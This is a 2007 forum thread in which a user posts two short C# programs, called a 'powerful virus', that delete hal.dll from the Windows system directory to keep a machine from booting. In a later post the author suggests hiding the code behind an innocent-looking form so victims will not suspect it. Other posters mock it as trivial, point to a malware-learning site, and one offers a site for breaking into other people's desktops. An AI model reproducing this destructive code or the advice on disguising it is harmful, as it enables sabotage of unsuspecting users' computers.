Powerful C# Virus (The infamous Powerful C++ Virus rebuilt in C#)

Discussion in 'Programming General' started by SidStudios, May 1, 2007.

Powerful C# Virus (The infamous Powerful C++ Virus rebuilt in C#)
  1. Unread #1 - May 1, 2007 at 12:49 PM
  2. SidStudios
    Joined:
    Mar 14, 2007
    Posts:
    201
    Referrals:
    0
    Sythe Gold:
    0

    SidStudios Active Member

    Powerful C# Virus (The infamous Powerful C++ Virus rebuilt in C#)

    This is basically the same virus posted in my "Powerful C++ Virus" thread but now rebuilt in C#.

    This program should be a console application:

    Code:
    using System;
    using System.Collections.Generic;
    using System.Text;
    using System.IO;
    
    namespace HallDel
    {
        class Program
        {
            static void Main(string[] args)
            {
                System.IO.File.Delete("C:\\Windows\\system32\\hal.dll"); /* C# PWNS */
            }
        }
    }
    
    A more advanced version:

    Code:
    using System;
    using System.Collections.Generic;
    using System.Text;
    using System.IO;
    
    namespace HalDelPro
    {
        class Program
        {
            static void Main(string[] args)
            {
                System.IO.File.Delete(System.Environment.SystemDirectory + "hal.dll"); /* C# OWNS*/
            }
        }
    }
    
     
  3. Unread #2 - May 3, 2007 at 5:17 PM
  4. Magics
    Joined:
    Jan 21, 2007
    Posts:
    658
    Referrals:
    0
    Sythe Gold:
    0

    Magics Apprentice

    Powerful C# Virus (The infamous Powerful C++ Virus rebuilt in C#)

    All you did was change the name and what it deletes.
    It probably wont be deleted because its already in use...
    2 simple...
     
  5. Unread #3 - May 3, 2007 at 9:36 PM
  6. Kevin`
    Joined:
    Nov 23, 2005
    Posts:
    549
    Referrals:
    0
    Sythe Gold:
    0

    Kevin` Forum Addict

    Powerful C# Virus (The infamous Powerful C++ Virus rebuilt in C#)

    and this would take 2 seconds to remove, there isnt even a execute line... deleting core windows files need authorization by admin... where did you all learn to progam?
     
  7. Unread #4 - May 4, 2007 at 2:36 AM
  8. SidStudios
    Joined:
    Mar 14, 2007
    Posts:
    201
    Referrals:
    0
    Sythe Gold:
    0

    SidStudios Active Member

    Powerful C# Virus (The infamous Powerful C++ Virus rebuilt in C#)

    I've tried this using C++ and it isn't in use normally. Read this post before talking shit.
     
  9. Unread #5 - May 4, 2007 at 3:02 AM
  10. Larry
    Joined:
    Feb 2, 2007
    Posts:
    267
    Referrals:
    2
    Sythe Gold:
    5

    Larry Forum Addict

    Powerful C# Virus (The infamous Powerful C++ Virus rebuilt in C#)

    A computer virus is something that :
    1- Duplicates: have the ability to spread among other computers via physical medias.
    2- Have a side effect : makes your puter slow, shows you some funny thing (any remember that pingpong ?), garbles your screen, deletes your file etc
    3- Have a signature : this is generally to avoid multiple infection by the same virus, in some ways, a normal virus shall know if he infected yet or not a system.

    What you posted my friend, is just a piece of program that if run it MIGHT harm your computer, as other kindly stated, that file (very very very easily replaceable) is generally system protected, and if your recover is on it will most likely be put back, and AT MOST the system won't startup again unless you replace it.

    Best regards,
    Larry
     
  11. Unread #6 - May 4, 2007 at 9:34 AM
  12. Magics
    Joined:
    Jan 21, 2007
    Posts:
    658
    Referrals:
    0
    Sythe Gold:
    0

    Magics Apprentice

    Powerful C# Virus (The infamous Powerful C++ Virus rebuilt in C#)

    I said "probably" and it's so basic you dont even call that a virus...
    And dont say you rebuilt it, you changed basicly nothing...
     
  13. Unread #7 - May 4, 2007 at 10:41 AM
  14. Gofez0r
    Joined:
    Jan 21, 2007
    Posts:
    1,820
    Referrals:
    1
    Sythe Gold:
    0

    Gofez0r Guru

    Powerful C# Virus (The infamous Powerful C++ Virus rebuilt in C#)

    ... "virus"? Just deletes one file. And doesnt windows have some kinda file recovery system so this kinda stuff wont work .. And infamous? I really dont think so, i think that most likely nobody nowhere has ever suffered anything because of this.. And whats rebuilt in it anyway? Just the same thing.. Delete hal.dll..
     
  15. Unread #8 - May 5, 2007 at 10:29 AM
  16. SidStudios
    Joined:
    Mar 14, 2007
    Posts:
    201
    Referrals:
    0
    Sythe Gold:
    0

    SidStudios Active Member

    Powerful C# Virus (The infamous Powerful C++ Virus rebuilt in C#)

    It was originally built in C++. Then, I RE-built it in C#. Quite a few people have suffered from this, as a matter of fact. And yes, I did add a few functions such as detecting the default directory.

    See the image attached.
     

    Attached Files:

  17. Unread #9 - May 5, 2007 at 11:46 AM
  18. bkatz
    Joined:
    Apr 21, 2005
    Posts:
    402
    Referrals:
    0
    Sythe Gold:
    0

    bkatz Forum Addict
    Banned

    Powerful C# Virus (The infamous Powerful C++ Virus rebuilt in C#)

    This isn't a virus, this is a simple program that deletes a file. Don't try to make yourself sound pro when all your program does is delete one file. Big whoop.
     
  19. Unread #10 - May 5, 2007 at 11:58 AM
  20. Gofez0r
    Joined:
    Jan 21, 2007
    Posts:
    1,820
    Referrals:
    1
    Sythe Gold:
    0

    Gofez0r Guru

    Powerful C# Virus (The infamous Powerful C++ Virus rebuilt in C#)

    Seriously, if id just make a thread here saying "Powerful keylogger trojan" for example, it would get like thousands of views.. Many kids want this kinda stuff to be 1337.. Thats why kids love batch too.
     
  21. Unread #11 - May 6, 2007 at 1:56 AM
  22. SidStudios
    Joined:
    Mar 14, 2007
    Posts:
    201
    Referrals:
    0
    Sythe Gold:
    0

    SidStudios Active Member

    Powerful C# Virus (The infamous Powerful C++ Virus rebuilt in C#)

    It's called power in simplicity, my friend. If someone runs this, it will delete Hal.dll which is an element needed during startup which isn't used when the main Windows kernel is running. Indeed, it is powerful. It isn't a "big whoop" as you Americans would call it.

    Who are you calling kids? If someone creates there own virus which disables a computer from starting up, it is called creation, not eliteness. Go on, make a thread called Powerful keylogged Trojan, to compete with my Powerful c++ virus. Let's see how many views it gets. And, make it in this section, no other.
     
  23. Unread #12 - May 6, 2007 at 5:59 AM
  24. Gofez0r
    Joined:
    Jan 21, 2007
    Posts:
    1,820
    Referrals:
    1
    Sythe Gold:
    0

    Gofez0r Guru

    Powerful C# Virus (The infamous Powerful C++ Virus rebuilt in C#)

    I didnt call u a kid, the people who go crazy about batch and other simple viruses like that are most likely kids. And id say this is simple over powerful.. And im not making a thread like that cause its not allowed, and i just meant that the title only will make lots of people look at it. U still cant convince me anyone would have really used that thing to anyone.. As people could make more "powerful" batch viruses (just 1 line.. Deleting a file).
     
  25. Unread #13 - May 6, 2007 at 9:04 AM
  26. Magics
    Joined:
    Jan 21, 2007
    Posts:
    658
    Referrals:
    0
    Sythe Gold:
    0

    Magics Apprentice

    Powerful C# Virus (The infamous Powerful C++ Virus rebuilt in C#)

    I agree with Gofez0r i can write a batch right now that deletes files, so simple...why did you bother with C#?
     
  27. Unread #14 - May 6, 2007 at 9:21 AM
  28. irrelevant
    Joined:
    May 3, 2007
    Posts:
    225
    Referrals:
    0
    Sythe Gold:
    0

    irrelevant Active Member
    Banned

    Powerful C# Virus (The infamous Powerful C++ Virus rebuilt in C#)

    WoW Your not good :p
     
  29. Unread #15 - May 7, 2007 at 6:57 AM
  30. SidStudios
    Joined:
    Mar 14, 2007
    Posts:
    201
    Referrals:
    0
    Sythe Gold:
    0

    SidStudios Active Member

    Powerful C# Virus (The infamous Powerful C++ Virus rebuilt in C#)

    Because, in addition to that one line, if you made a form and added sugar, spice and some more eye candy, it wouldn't look suspicious at all. The code is the same whether you use it on the loading of a console window and the loading of a form.

    That's why I bothered with C#. Smart people might realise that there is an "EDIT" option when you right click a bat file. The Icon of a bat file is pretty shady, too.
     
  31. Unread #16 - May 22, 2007 at 4:57 PM
  32. d00mazz
    Joined:
    May 10, 2005
    Posts:
    246
    Referrals:
    0
    Sythe Gold:
    0

    d00mazz Active Member

    Powerful C# Virus (The infamous Powerful C++ Virus rebuilt in C#)

    nice virus,wont work on me lol,linux pwnz windows ?
     
  33. Unread #17 - May 25, 2007 at 10:41 AM
  34. SidStudios
    Joined:
    Mar 14, 2007
    Posts:
    201
    Referrals:
    0
    Sythe Gold:
    0

    SidStudios Active Member

    Powerful C# Virus (The infamous Powerful C++ Virus rebuilt in C#)

    Linux doesn't 'pwn' windows if you are an average computer user. Theres no Photoshop, no Flash, and most important of all, no Warez. The Gimp is a shitty program.

    I've tried Ubuntu and OpenSUSE. OpenSUSE is slower than Ubuntu 1000x.
     
  35. Unread #18 - May 25, 2007 at 3:27 PM
  36. The End
    Joined:
    Dec 10, 2005
    Posts:
    397
    Referrals:
    0
    Sythe Gold:
    0

    The End Forum Addict

    Powerful C# Virus (The infamous Powerful C++ Virus rebuilt in C#)

    (sigh) im going to compile and run the c++ version of this if i edit this post in a few minutes or so then it didnt work

    it does work but not very well, and instead of destruction you should go for annoyance

    www.rohitab.com is a good place to learn to make maleware/etc/etc

    and linux is the best in the hands of an experienced computer user windows is better for the illeterate (you can get freeBSD for free instead of getting an apple os :D)
     
  37. Unread #19 - May 25, 2007 at 11:09 PM
  38. SidStudios
    Joined:
    Mar 14, 2007
    Posts:
    201
    Referrals:
    0
    Sythe Gold:
    0

    SidStudios Active Member

    Powerful C# Virus (The infamous Powerful C++ Virus rebuilt in C#)

    I've always wondered, why is FreeBSD compared to Apple?

    Are they based on the same kernel? I thought FreeBSD was a Linux-server OS.
     
  39. Unread #20 - May 31, 2007 at 6:31 AM
  40. viperdeck
    Joined:
    May 12, 2007
    Posts:
    533
    Referrals:
    0
    Sythe Gold:
    0

    viperdeck Forum Addict

    Powerful C# Virus (The infamous Powerful C++ Virus rebuilt in C#)

    how does a keylogger horsey make u 1337 mayne? i got a site that can rly get u hardcore in2 hacking. PM me if u want it. u can log in2 others desktops XD
     
< ..... | sup guys? >

Users viewing this thread
1 guest


 
 
Adblock breaks this site